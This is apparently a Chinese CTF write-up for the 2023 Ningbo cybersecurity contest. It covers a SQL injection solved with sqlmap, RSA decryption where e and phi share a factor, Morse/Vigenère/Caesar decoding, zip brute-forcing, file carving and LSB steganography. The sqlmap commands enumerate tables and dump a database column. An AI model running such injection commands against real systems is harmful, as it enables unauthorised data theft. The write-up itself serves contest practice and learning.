2023宁波市第六届网络安全大赛部分wp

目录

Web

Query

Crypto

secret

Morse的笔记本

Misc

zip

SimpleDocument

BeautifulImage


Web

Query

sql注入,bp抓包保存为1.txt,用sqlmap跑一下得到结果

sqlmap -r /home/csxf418/桌面/1.txt  -p username -D mysql --tables

79e31116853b4709a603e9e2c7e0c0de.png

sqlmap -r /home/csxf418/桌面/1.txt  -p username -D ctf --tables

34f7033da36b4c03bd63b3163c7859c4.png

sqlmap -r /home/csxf418/桌面/1.txt  -p username -D ctf -T f111 --columns

6b861f9cb1e14a32abce7ded60e0ef72.png

sqlmap -r /home/csxf418/桌面/1.txt  -p username -D ctf -T f111 -C flagdata --dump

a3a0d0e221164e26b348e2d35f4e4229.png

Crypto

secret

给了p,q,n,c,e,看样子是rsa,这里发现e,phi不互素,脚本跑一下

import libnum,gmpy2

from Crypto.Util.number import long_to_bytes


p=134261118796789547851478407090640074022214132682000430136383795981942884853000826171189906102866323044078348933419038543719361923320694974970600426450755845839235949167391987970330836004768360774676424958554946699767582105556239177450470656065560178592346659948800891455240736405480828554486592172443394370831

q=147847444534152128997546931602292266094740889347154192420554904651813340915744328104100065373294346723964356736436709934871741161328286944150242733445542228293036404657556168844723521815836689387184856871091025434896710605688594847400051686361372872763001355411405782508020591933546964183881743133374126947753

n=19850163314401552502654477751795889962324360064924594948231168092741951675262933573691070993863763290962945190372400262526595224437463969238332927564085237271719298626877917792595603744433881409963046292095205686879015029586659384866719514948181682427744555313382838805740723664050846950001916332631397606277703888492927635867870538709596993987439225247816137975156657119509372023083507772730332482775258444611462771095896380644997011341265021719189098262072756342069189262188127428079017418048118345180074280858160934483114966968365184788420091050939327341754449300121493187658865378182447547202838325648863844192743

c=13913396366755010607043477552577268277928241319101215381662331498046080625902831202486646020767568921881185124894960242867254162927605416228460108399087406989258037017639619195506711090012877454131383568832750606102901110782045529267940504471322847364808094790662696785470594892244716137203781890284216874035486302506042263453255580475380742959201314003788553692977914357996982118328587119124144181290753389394149235381045389696841471483947310663329993873046123134587149661347999774958105091103806375702387084149309542351541021140111048408248121408401601979108510758891595550054699719801708646232427198902271953673874

e=28    #4*7

fn=(p-1)*(q-1)

d4 = libnum.invmod(7,fn)

# print("d4=%d" % d)

m4 = pow(c, d4, n)

m = gmpy2.iroot(m4,4)[0]

flag = long_to_bytes(m)

print(flag)

 

ed5c7eef9a2940eeb03be1afc4b17aa2.png

Morse的笔记本

将文字中的句号看成点,逗号看成短杠,感叹号看出斜杠

解出摩斯密码为:PASSWORDISCONGRATS

69ca4ca5c8724d7897e01a16b053eab5.png

维吉尼亚解密得到

4d1268853ad14e80bde32dc05d345287.png

凯撒枚举得到flag

e34dcaf30c3d4271bfe6917f4efae8b2.png

Misc

zip

1f761958bee94651a1d3d9ab5eb97adb.png

打开发现有提示,密码由0和1组成,最多不超过9位数,爆破一下

5f241adb1df14e92bdcd301138eb6ee0.png

打开得到flag

SimpleDocument

根据提示不只有图片,猜测还隐藏了文件,kali下foremost命令分离文件,得到一个pdf

c71239f7b5134585bf4ffdc6e4fb83ae.png

pdftotext 00000130.pdf 1.txt

将pdf文件转成txt,得到flag

edde4c39dd0f40c296e92da8fc8359b2.png

BeautifulImage

LSB隐写,StegSolve打开,看到一串像是base64

03d4ec9172d84d378cea51f7d14b7e11.png

解码一下得到flag

b76b3235645a4657a93fae479305daa9.png

 

  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值